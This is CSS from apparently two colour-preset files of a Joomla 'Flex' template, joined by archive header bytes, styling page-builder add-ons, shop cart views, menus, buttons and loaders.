.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #fca224;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #fca224;
}
.light .sppb-selector span i {
  color: #fee2bb;
}
.light .sppb-selector >i {
  color: #fed7a2;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #fee2bb;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #fdb756;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #fcad3d;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #fca224;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #fca224;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #fca224;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fa {
  color: #fee2bb;
}
.sppb-media footer strong {
  color: #fcad3d;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #fdb756;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #fdcd89;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #fcad3d;
  box-shadow: 0 0 5px rgba(252,162,36,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #fdbc60;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #fdc26f;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #fdc26f;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #fed7a2;
}
.dark .acymailing_form input.inputbox {
  color: #fdc67a;
}
.dark .acymailing_form input.inputbox:focus {
  border: 1px solid #fdc26f;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #fdcd89 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #fdb756 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #fdcd89 !important;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #fcad3d;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #fca224;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #fdc26f;
}
.error-page .error-page-inner >div.container .error-code {
  color: #fdb756;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #fcad3d;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #fcad3d;
}
.sp-button {
  border-color: #fdc26f !important;
}
.sp-selected-button {
  background-color: #fca224 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #fca224 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #d17b03 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(252,162,36,0.8);
}
.cd-customization .add-to-cart {
  background-color: #fca224;
}
.cd-customization .add-to-cart:hover {
  background-color: #f99303;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #f99303;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #fca224;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #fdbc60;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #fca224;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(252,162,36,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #fca224;
  border-top: 1px solid rgba(252,162,36,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #fdc26f;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(252,162,36,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #fca224;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #fca224;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #fc970b;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #fca224;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #ea8a03;
}
.cart-view .billto-shipto a.details {
  background: #fca224;
}
.cart-view .billto-shipto a.details:hover {
  background: #ea8a03;
}
.cart-view table.cart-summary tr th {
  background: #fca224;
  border: solid 1px #fca224;
}
.cart-view table.cart-summary input.details-button {
  background: #fca224;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #fca224;
}
.sectiontableentry1 td a.change-payment {
  color: #fdb756;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #fca224;
}
.vm-button-correct {
  background-color: #fca224;
}
.vm-button-correct:hover {
  background-color: #fc970b;
}
.vm-button {
  background-color: #fdb756;
}
#com-form-login-remember input.default {
  background: #fca224;
}
#com-form-login-remember input.default:hover {
  background: #fc970b;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #fca224;
  color: #fca224;
}
.control-buttons button.default {
  background: #fca224;
}
.control-buttons button.default:hover {
  background: #fc970b;
}
span.userfields_info {
  color: #fca224;
  border-bottom: 1px solid #fca224;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #fca224;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #fca224;
}
.vm-flex-search .vm-search-button >i {
  color: #fdc26f;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #fca224;
}
.chzn-container-active .chzn-single {
  border: 1px solid #fca224 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #fca224;
}
.vm-menu .vm-title {
  border-top: 1px solid #fdb756;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #fca224;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(252,162,36,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(252,162,36,0.85);
    stroke: #fca224;
  }
}
PK!&k��@�@�flex/css/presets/preset3.cssnu&1i�.major_color_bckg-100 {
  background-color: #f0e95b;
}
.major_color_bckg-90 {
  background-color: rgba(240,233,91,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(240,233,91,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(240,233,91,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(240,233,91,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(240,233,91,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(240,233,91,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(240,233,91,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(240,233,91,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(240,233,91,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #f0e95b !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #f4ef8a;
}
.major_color-lighten-20 {
  color: #f9f6b8;
}
.major_color-lighten-30 {
  color: #fdfce7;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #f0e95b;
  border-bottom: 2px solid #f0e95b;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #f0e95b;
  border-bottom: 2px solid #f0e95b;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #f0e95b;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #f0e95b;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #f4ef8a;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(240,233,91,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #f0e95b;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(240,233,91,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #d2c913;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #f0e95b;
}
.sp-module ul.accordion-menu li.current > a {
  color: #f0e95b;
}
.nav.menu li.current > a {
  color: #f0e95b;
}
.close-offcanvas:hover {
  border: 1px solid #f0e95b;
  color: #f0e95b;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #f0e95b none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #f0e95b none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #f0e95b none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #f0e95b none repeat scroll 0 0;
}
a {
  color: #f0e95b;
}
a:hover {
  color: #ece32c;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dd >i,
.article-info >dd >span.fa {
  color: #f4ef8a;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #f4ef8a;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #eee644;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #ece32c;
}
#offcanvas-toggler >i {
  color: #f4ef8a;
}
#offcanvas-toggler >i:hover {
  color: #f0e95b;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #efe852;
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #e9df15;
  background-color: #eee648;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #f0e95b;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(240,233,91,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(240,233,91,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #f2ec72;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f0e95b;
  color: #f0e95b;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #ece32c;
  border: 2px solid #f0e95b !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #ece32c;
  border-bottom-color: #f0e95b;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #f0e95b;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #f4ef8a;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #f0e95b;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
